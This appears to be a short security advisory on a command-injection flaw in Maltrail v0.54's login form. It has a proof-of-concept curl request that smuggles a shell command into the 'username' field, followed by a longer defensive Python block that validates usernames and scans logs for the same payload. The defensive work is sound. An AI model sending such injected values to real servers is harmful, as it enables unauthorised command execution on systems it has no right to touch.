๐Ÿ›ค๏ธMaltrail - OS Command Injection

Application Description

Maltrail is a malicious traffic detection system; read more about it HERE.

Vulnerability Description

On February 24th, 2023, a researcher discovered and reported a vulnerability in Maltrail v0.54. This vulnerability exposes the system to unauthenticated OS command injection during the login process.

POC

Maltrail main web page

The vulnerability exists in the 'username' parameter, which is susceptible to blind OS command injection.

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/test`'
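The request above shows the shape of the issue: a form field that the server hands to a shell. As an added example (not Maltrail's own code, and written from the defending side), the block below does two things a practitioner would want: it validates a username against a strict allowlist so that shell metacharacters can never reach a command, and it scans request logs for login bodies whose fields carry shell metacharacters, using the page's own payload as one of the samples. The log format, IP addresses, timestamps and helper names are constructed for the example.

```python
"""Input validation and log-based detection for shell-metacharacter
injection in a login 'username' parameter.

Added, illustrative code; not Maltrail's own code. The log line format
and the request bodies in SAMPLE_LOG are constructed samples.
"""
import re
from urllib.parse import unquote_plus

# Characters and sequences that let a value break out of a command string
# when the server interpolates it into a shell command.
SHELL_META = re.compile(r"[;&|`$<>\n]|\$\(")

# Strict allowlist for usernames: letters, digits, dot, underscore, hyphen,
# 1 to 64 characters. Anything else is rejected before any further use.
USERNAME_OK = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Constructed log format (hypothetical): "<ts> <client-ip> <method> <path> body=<form>"
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) body=(.*)$")

# Constructed sample log; the third line carries the payload from the PoC.
SAMPLE_LOG = [
    "2023-02-24T12:00:01Z 203.0.113.5 POST /login body=username=alice&password=p%40ss",
    "2023-02-24T12:00:02Z 203.0.113.7 POST /login body=username=bob.smith&password=hunter2",
    "2023-02-24T12:00:03Z 198.51.100.9 POST /login body=username=;`id > /tmp/test`",
    "2023-02-24T12:00:04Z 203.0.113.5 GET /ping body=",
]


def username_is_valid(username: str) -> bool:
    """Allowlist check: True only for names made of the permitted characters."""
    return USERNAME_OK.fullmatch(username) is not None


def argv_for_username(program: str, username: str) -> list:
    """Hardened pattern: validate first, then build an argv list so the value
    is passed as a single argument and no shell ever parses it.
    (Hypothetical helper; 'program' is whatever the caller needs to run.)"""
    if not username_is_valid(username):
        raise ValueError("rejected username")
    return [program, "--user", username]


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}.
    Splits only on '&' so a ';' inside a value is kept as part of the value."""
    fields = {}
    if not body:
        return fields
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def suspicious_fields(body: str) -> dict:
    """Return {field: value} for every form field whose decoded value
    contains a shell metacharacter."""
    return {name: value for name, value in parse_form(body).items()
            if SHELL_META.search(value)}


def scan_log(lines: list) -> list:
    """Run the detection over log lines and return one finding per
    suspicious field: (timestamp, client_ip, path, field, value)."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, ip, _method, path, body = m.groups()
        for field, value in suspicious_fields(body).items():
            findings.append((ts, ip, path, field, value))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("suspicious login field:", finding)
```

The validation side is the real fix: once the username can only contain allowlisted characters and is passed as an argv element rather than interpolated into a shell string, the payload in the PoC is rejected before it reaches any command. The detection side is a fallback for logs of systems that have not yet been patched; it is deliberately narrow (metacharacters in form values) so that it stays cheap to run over high-volume access logs.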

Resources
